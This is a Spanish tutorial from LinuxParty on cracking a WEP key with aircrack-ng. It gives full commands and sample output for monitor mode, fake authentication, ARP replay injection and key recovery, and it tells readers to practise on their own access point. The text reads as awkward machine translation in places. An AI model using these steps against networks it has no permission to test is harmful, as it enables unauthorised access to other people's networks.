LinuxParty

NUESTRO SITIO necesita la publicidad para costear hosting y el dominio. Por favor considera deshabilitar tu AdBlock en nuestro sitio. También puedes hacernos una donación entrando en linuxparty.es, en la columna de la derecha.

Ratio: 5 / 5

Inicio activadoInicio activadoInicio activadoInicio activadoInicio activado
 
Este tutorial le guiará a través de un caso muy sencillo para romper una clave WEP. Su objetivo es desarrollar sus habilidades básicas y conseguir familiarizarse con los conceptos. Se supone que usted tiene un portatil wifi con los controladores ya parcheados para la inyección.

El concepto básico detrás de este tutorial está utilizar aireplay-ng replay, un paquete ARP para generar nuevos IVs. A su vez, aircrack-ng utiliza los IVs para crackear la clave WEP. Es importante entender lo que es un paquete ARP. Esta sección "¿Qué es una ARP?" le proporciona los detalles.

Para una guía novato de principio a fin, consulte la Guía del Newbie Linux. Aunque este tutorial no cubre todos los pasos,  pretende proporcionar ejemplos mucho más detalladas sobre los pasos para romper una clave WEP, también explicando el motivo y el fondo de cada paso. Para obtener más información sobre la instalación de aircrck-ng, consulte Instalación de Aircrack-ng y para la instalación de controladores vea Instalación de los controladores.

Se recomienda que usted experimente con su propio punto de acceso inalámbrico para familiarizarse con estas ideas y técnicas. Si usted no posee un punto de acceso propio, recuerde que obtener el permiso del propietario antes de jugar con él.

Me gustaría reconocer y agradecer al equipo de Aircrack-ng por crear estas herramientas tan fantásticas.

Por favor, deje algún comentario sobre cualquier sugerencia constructiva, positiva o negativa, u otras ideas para solucionar problemas y sugerencias son especialmente bienvenidos.

Supuestos

En primer lugar, esta solución se supone:

  • Estás usando drivers parcheados para la inyección. Utilice la prueba de inyección para confirmar tu tarjeta puede inyectar antes de proceder.
  • Estás físicamente suficientemente cerca para enviar y recibir paquetes del punto de acceso. Recuerde que sólo porque usted pueda recibir paquetes desde algún punto de acceso no significa que usted pueda ser capaz de transmitir los paquetes. La fuerza de la tarjeta inalámbrica generalmente es menor que la fuerza de AP. Así que tienes que estar físicamente cerca para que los paquetes de transmisión puedan llegar y ser recibidos por la AP. Usted debe confirmar que puede comunicarse con la unidad específica AP siguiendo estas instrucciones.
  • Hay por lo menos un cable o cliente inalámbrico conectado a la red y están activos. La razón es que este tutorial depende de recibir al menos un paquete de petición ARP y si no hay clientes activos no habrá nunca ningún paquete de petición ARP.
  • Usted está utilizando v0.9 de aircrack-ng (o superior). Si utiliza una versión diferente a continuación algunas de las opciones comunes pueden haber cambiado.

Asegúrese de que todas las hipótesis anteriores son ciertas, de lo contrario el consejo que sigue no va a funcionar. En los ejemplos siguientes, usted tendrá que cambiar "ath0" por el nombre de la interfaz que es específica para su tarjeta inalámbrica.

El equipo utilizado

En este tutorial, esto es lo que se utilizó:

  • Dirección MAC del PC ejecutando la suite aircrack-ng: 00:0F:B5:88:AC:82
  • BSSID (dirección MAC del punto de acceso):  00:14:6C:7E:40:80
  • ESSID (nombre de red inalámbrica): peluche ( habrá veces que aparezca como "teddy")
  • Canal de acceso punto: 9
  • Interfaz inalámbrica: ath0

Usted debe obtener la información equivalente para la red que va a trabajar en el. A continuación, sólo cambie los valores en los ejemplos siguientes a la red específica.

Solución

Introducción a la Solución

Para obtener la clave WEP de un punto de acceso, es necesario reunir una cantidad de Vectores de Inicialización (IVs). El tráfico de red normal no suele generar estos IVs muy rápidamente. En teoría, si usted es paciente, puede recopilar suficientes IVs para crackear la clave WEP con sólo escuchar el tráfico de red y guardarlos. Dado que ninguno de nosotros es paciente, se utiliza una técnica llamada inyección para acelerar el proceso. La Inyección implica tener el punto de acceso (AP) volver a enviar los paquetes seleccionados muy rápidamente. Esto nos permite captar un gran número de paquetes en un corto período de tiempo.

Una vez que hemos capturado una gran cantidad de ivs, se puede utilizar para determinar la clave WEP.

Estos son los pasos básicos que se van a través de:

  1. Colocar la interface wireless en modo monitor y especificar el canal del AP
  2. Pon a prueba la capacidad de inyección del dispositivo móvil en el AP
  3. Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso
  4. Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar IVs nuevos
  5. Iniciar aireplay-ng en el modo de reproducción de petición ARP para inyectar paquetes
  6. Ejecutar aircrack-ng para obtener claves mediante los IVs recogidos

Paso 1 - Colocar la interface wireless en modo monitor y el canal del AP

El propósito de este paso es poner la tarjeta en lo que se denomina modo de monitor. El modo monitor es el modo mediante el cual la tarjeta se puede escuchar todos los paquetes en el aire. Normalmente la tarjeta solo "escuchará" los paquetes dirigidos a usted. Al escuchar todos los paquetes, que más tarde puede seleccionar alguna de inyección. Además, sólo (hay algunas excepciones raras) el modo de monitor le permite inyectar paquetes. (Nota: este procedimiento es diferente para las tarjetas Atheros.)

ath0 La primera parada de este modo:

  airmon-ng stop ath0 

El sistema responde:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Escriba "iwconfig" para asegurar que no hay otros interfaces athX. Debe tener un aspecto similar al siguiente:

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.

Si hay interfaces athX restantes, debe detener cada uno de ellos. Cuando haya terminado, ejecuta "iwconfig" para garantizar que no quede ninguno.

Ahora, introduzca el siguiente comando para iniciar la tarjeta inalámbrica en el canal 9 en modo monitor:

  airmon-ng start wifi0 9 

Sustituya el número de canal por el del Punto de Acceso (AP) que ejecuta, que habíamos indicado como "9" en el comando anterior. Esto es importante. Usted debe tener su tarjeta inalámbrica bloqueado en el canal de AP para los siguientes pasos de este tutorial para que funcione correctamente.

Nota: En este comando usamos "wifi0" en lugar de nuestra interface "ath0". Esto es porque los controladores madwifi-ng están siendo utilizados. Para otros drivers, utilizará el nombre de la interfaz inalámbrica. Ejemplos: "wlan0" o "rausb0".

El sistema responderá:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Usted se dará cuenta de que "ath0" pone que se encuentra en modo monitor.

Para confirmar que la interface está bien configurada, escribimos "iwconfig".

El sistema responderá:

  lo no wireless extensions.
 
  wifi0 no wireless extensions.
 
  eth0 no wireless extensions.
 
  ath0 IEEE 802.11g ESSID: "" Nickname: ""
         Modo: monitor de frecuencia: 2.452 GHz Access Point: 00:0 F: B5: 88: AC: 82   
         Bit Rate: 0 kb / s Tx-Power: 18 dBm Sensibilidad = 0/3  
         Retry: off RTS thr: off Fragment thr: off
         Clave de cifrado: en el
         Administración de energía: en el
         Link Quality = 0/94 Nivel de señal = -95 dBm Nivel de ruido = -95 dBm
         Rx válido nwid: 0 cripta de Rx no es válido: 0 Rx válido frag: 0
         Tx excesivas reintentos: 0 Invalid misc: 0 Missed beacon: 0 

En la respuesta anterior, se puede ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que es el canal 9 y el punto de acceso muestra la dirección MAC de su tarjeta inalámbrica. Tenga en cuenta que sólo los controladores madwifi-ng mostrarán la dirección MAC de su tarjeta de red inalámbrica, otros drivers no lo hacen. Así que todo va bien. Es importante comprobar toda esta información antes de proceder, de lo contrario los pasos siguientes no funcionarán correctamente.

Para que coincida con la frecuencia del canal, compruebe Esto http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 le dará la frecuencia para cada canal.

Paso 2 - Wireless Device Packet Injection

El propósito de este paso se asegura de que su tarjeta está a poca distancia de su punto de acceso y se puede inyectar paquetes a la misma.

Intro:

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0

Donde:

  • -9 Medio de pruebas de inyección
  • -e teddy es el nombre de red inalámbrica
  • -a 00:14:6C:7E:40:80 es el punto de acceso de direcciones MAC
  • ath0 es el nombre de la interfaz inalámbrica

El sistema debería responder con:

  09:23:35 Waiting for beacon frame (BSSID: 00:14:6C: 7E:40:80) en el canal 9
  09:23:35 Tratando de solicitudes de difusión de la sonda ...
  09:23:35 inyección está funcionando!
  09:23:37 Found 1 AP 
 
  09:23:37 Tratando dirigidas solicitudes de sonda ...
  09:23:37 00:14:6C:7E:40:80 - canal: 9 - 'teddy'
  09:23:39 Ping (min / avg / max): Potencia 1.827ms/68.145ms/111.610ms: 33,73
  09:23:39 30/30: 100% 

La última línea es importante. Lo ideal es que debería decir el 100% o un porcentaje muy alto. Si es bajo, entonces usted está demasiado lejos del punto de acceso o demasiado cerca. Si es cero, entonces la inyección no funciona y tienes que parchear los drivers o utilizar diferentes controladores.

Ver la prueba de inyección para obtener más detalles.

Paso 3 - Iniciar airodump-ng para capturar los IVs

El propósito de este paso es capturar los IVs generados. Este paso inicia airodump-ng para capturar los IVs desde el punto de acceso específico.

Abre una consola para capturar los IVs generados. A continuación, escriba:

 airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Donde:

  • -c 9 es el canal para la red inalámbrica
  • --bssid 00:14:6C:7E:40:80 es el punto de acceso de direcciones MAC. Esto elimina el tráfico de otras redes.
  • -w captura y guarda en un archivo que contendrá los IVs.
  • ath0 es el nombre de la interfaz.

Mientras que la inyección se lleva a cabo (más tarde), la pantalla será similar a esta:

 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 
                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  

Paso 4 - Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso

Para que un punto de acceso acepte un paquete, la dirección MAC de origen ya debe estar asociado. Si la dirección MAC de origen se está inyectando no está asociado a continuación, el AP ignorará el paquete y envía un paquete de "Deautenticación" en texto plano. En este estado, no se crearán nuevos IVs porque el AP está ignorando todos los paquetes inyectados.

La falta de asociación con el punto de acceso es la razón más general por la que la inyección falla. Recuerde la regla de oro: La MAC que se utiliza para la inyección debe ser asociado con el AP, ya sea usando la falsa autenticación o el uso de una dirección MAC de un cliente ya asociado.

Para asociarse con un punto de acceso, utilice la autenticación falsa:

 aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Donde:

  • -1 Significa falsa autenticación
  • 0 tiempo de reasociación en segundos
  • -e teddy es el nombre de red inalámbrica
  • -a 00:14:6 C: 7E: 40:80 es el punto de acceso de direcciones MAC
  • -h 00:0 F: B5: 88: AC: 82 es nuestra tarjeta de dirección MAC
  • ath0 es el nombre de la interfaz inalámbrica

El éxito se ve así:

  18:18:20 Enviando petición de autenticación
 18:18:20 autenticación exitosa
 18:18:20 Sending petición de la asociación
 18:18:20 Asociación de éxito :-) 

U otra variación de algunos puntos de acceso:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0 

Donde:

  • 6000 - Reauthenticate cada segundo de 6000. El largo período de tiempo también hace que mantenga vivos los paquetes para ser enviados.
  • -o 1 - Enviar sólo un conjunto de paquetes a la vez. El valor predeterminado es múltiple y esto puede confundir a algunos APs.
  • -q 10 - Enviar los paquetes de mantener con vida cada 10 segundos.

El éxito se ve así:

  18:22:32 Enviando petición de autenticación
 18:22:32 autenticación exitosa
 18:22:32 Enviando petición Asociación
 18:22:32 Asociación de éxito :-)
 18:22:42 El envío de paquetes keep-alive
 18:22:52 El envío de paquetes keep-alive
 # Y así sucesivamente. 

He aquí un ejemplo de lo que un error en la autenticación se ve así:

  08:28:02 Enviando petición de autenticación
 18:28:02 autenticación exitosa
 18:28:02 El envío de solicitud de la Asociación
 18:28:02 Asociación de éxito :-)
 18:28:02 Tengo un paquete deauthentication!
 18:28:05 Enviando petición de autenticación
 18:28:05 autenticación exitosa
 18:28:05 El envío de solicitud de la Asociación
 18:28:10 Enviando petición de autenticación
 18:28:10 autenticación exitosa
 18:28:10 El envío de solicitud de la Asociación 

Observe el "Obtenido un paquete deauthentication" y los continuos intentos anteriores. No continúe con el siguiente paso hasta que tenga la falsa autenticación de forma correcta.

==========

Consejos para solucionar problemas

  • Algunos puntos de acceso están configurados para sólo permitan seleccionadas direcciones MAC para asociar y conectar. Si este es el caso, usted no será capaz de hacer una falsa autenticación con éxito a menos que sepa una de las direcciones MAC en la lista de permitidos. Si sospecha que este es el problema, utilice el comando siguiente al intentar hacer una falsa autenticación. Iniciar una nueva sesión y ...

Ejecutar: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

A continuación, se busque mensajes de error.

  • Si en algún momento usted desea confirmar que está correctamente asociada es el uso de tcpdump y mirar los paquetes. Iniciar una nueva sesión y ...

Ejecutar:  “tcpdump -n -e -s0 -vvv -i ath0” 

Aquí es un típico mensaje de error de tcpdump que estás buscando:

 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   
DeAuthentication: Class 3 frame received from nonassociated station

Observe que el punto de acceso (00:14:6c:7e:40:80) le está diciendo a la fuente (00:0F:B5:88:AC:82) que no están asociados. Esto quiere decir que el AP no aceptará los paquetes inyectados.

Si desea seleccionar los paquetes con tcpdump deauth entonces usted puede usar: "tcpdump-n-e-s0-vvv-i ath0 | grep-i deauth". Es posible que tenga que modificar la frase "deauth" para seleccionar los paquetes exactos que usted desea.

Paso 5 - Iniciar aireplay-ng en el modo de reproducción de petición de ARP

El propósito de este paso es comenzar a utilizar aireplay-ng en un modo que escucha las peticiones ARP luego reinyecta de nuevo en la red. Para obtener una explicación de la ARP, consulte esta página de la revista PC Magazine o la Wikipedia. La razón por la que selecciona paquetes de solicitud ARP se debe a la AP que normalmente les retransmite y generar un nuevo IV. nuevamente, esto es nuestro objetivo, para obtener un gran número de IVs en un corto período de tiempo.

Abre otra consola y escribe:

 aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Se iniciará la escucha de peticiones ARP y cuando oye una, aireplay-ng inmediatamente comenzará a inyectar. Vea la sección de trucos generación de ARP  si la pantalla dice "tiene 0 peticiones ARP" después de esperar mucho tiempo.

Esto es lo que verá en la pantalla cuando las peticiones ARP están siendo inyectadas:

 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets... 

Usted puede confirmar que se está inyectando, al revisar su pantalla de airodump-ng. Los paquetes de datos deben estar en aumento rápidamente. El "# / s" debe ser un número decente. Sin embargo, decente depende de una gran variedad de factores. Un intervalo típico es de 300 a 400 paquetes de datos por segundo.Otras veces puede ser tan bajo como 100/segundo y tan alto como un 500/segundo.

Consejos para solucionar problemas

  • Si recibe un mensaje similar a "¿Tienes un paquete deauth / disassoc. Es la fuente de MAC asociada? ", Esto significa que ha perdido asociación con la AP. Todos los paquetes inyectados serán ignorados. Usted debe regresar a la falsa autenticación del paso 3 y asociarse con éxito a la AP.

Paso 6 - Ejecutar aircrack-ng para obtener la clave WEP

El propósito de este paso es obtener la clave WEP a partir de los IVs obtenidos en los pasos anteriores.

Nota: Para fines de aprendizaje, se debe utilizar una clave WEP de 64 bits en el AP para acelerar el proceso de craqueo. Si este es el caso, entonces puede incluir "-n 64" para limitar la comprobación de claves de 64 bits.

Dos métodos se muestran. Se recomienda probar los dos con fines de aprendizaje. Al tratar de los dos métodos, usted verá rápidamente el método PTW que determina la clave WEP en comparación con el método FMS / Korek. Como recordatorio, el método PTW solo funciona con éxito con ARP de solicitud / respuesta de paquetes. Dado que este tutorial se refiere a la inyección de paquetes de petición ARP, puede usted utilizar este método. El otro requisito es que permite capturar el paquete completo con airodump-ng. Esto quiere decir que no utilice la opción "--Ivs".

Inicia otra consola y escribe:

 aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Donde:

  • -B 00:14:6 C: 7E: 40:80 selecciona el punto de acceso que nos interesa pulg Esto es opcional ya que cuando originalmente capturado los datos, se aplicó un filtro para capturar sólo los datos de este punto de una.
  • output*.cap selecciona todos los archivos que comienzan con "output" y que termina en ". cap".

Para utilizar también el método FMS / Korek, iniciar otra sesión de consola y escribe:

 aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap

Donde:

  • -K invoca el método FMS / Korek
  • -B 00:14:6C:7E:40:80 selecciona el punto de acceso que nos interesa pulg Esto es opcional ya que cuando originalmente capturado los datos, se aplicó un filtro para capturar sólo los datos de este punto de una.
  • output*.cap selecciona todos los archivos que comienzan con "output" y que termina en ".cap".

Si utiliza la versión 1.0-RC1, añada la opción "-K" por el ataque FMS / KoreK. (1.0-RC1 por defecto PTW).

Puede ejecutar este, mientras que la generación de paquetes. En poco tiempo, la clave WEP será calculado y presentado. Usted necesitará aproximadamente 250.000 IVs para 64 bits y 1.500.000 IVs para claves de 128 bits. Si está utilizando el ataque PTW, entonces usted tendrá alrededor de 20.000 paquetes para 64-bit y de 40.000 a 85.000 paquetes de 128 bits. Estos son muy aproximados y hay muchas variables en cuanto a cómo muchos IVs que realmente se necesita para obtener la clave WEP.

Esto es lo que parece el éxito:

                     Aircrack-ng 0.9
 
 
                              [00:03:06] Tested 674449 keys (got 96610 IVs)
 
 KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) 
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) 
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) 
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 
 
                       KEY FOUND! [ 12:34:56:78:90 ] 
      Probability: 100%

Tenga en cuenta que en este caso se tomó muy inferiores a los 250.000 IVs para crackear la clave. (Para este ejemplo, el ataque FMS / KoreK fue utilizado.)

Solución de problemas generales

La generación de ARP

Para trabajar con este tutorial, usted debe recibir por lo menos un paquete ARP. En la red doméstica, esta es una manera fácil de generar un paquete ARP. En un PC con cable o inalámbrica, haga ping a una IP que no existe en su red casera. Un PC con cable significa un PC conectado a la LAN mediante un cable Ethernet. Digamos que su casa un espacio de direcciones de LAN es 192.168.1.1 y 192.168.1.254. Elija una dirección IP entre 1 y 254 que no se asigna a un dispositivo de red. Por ejemplo, si la IP 192.168.1.213 no se utiliza a continuación, "ping 192.168.1.213". Esto hará que una ARP que será transmitida a través de su punto de acceso inalámbrico y, a su vez, esto dará inicio a la reinyección de paquetes de aireplay-ng.

Pin It

Escribir un comentario


Código de seguridad
Refescar



Redes:



 

Suscribete / Newsletter

Suscribete a nuestras Newsletter y periódicamente recibirás un resumen de las noticias publicadas.

Donar a LinuxParty

Probablemente te niegues, pero.. ¿Podrías ayudarnos con una donación?


Tutorial de Linux

Filtro por Categorías

Usamos cookies propias y de terceros para mejorar la navegación y tareas analíticas. Al continuar navegando entendemos que aceptas nuestra política de cookies. Ver política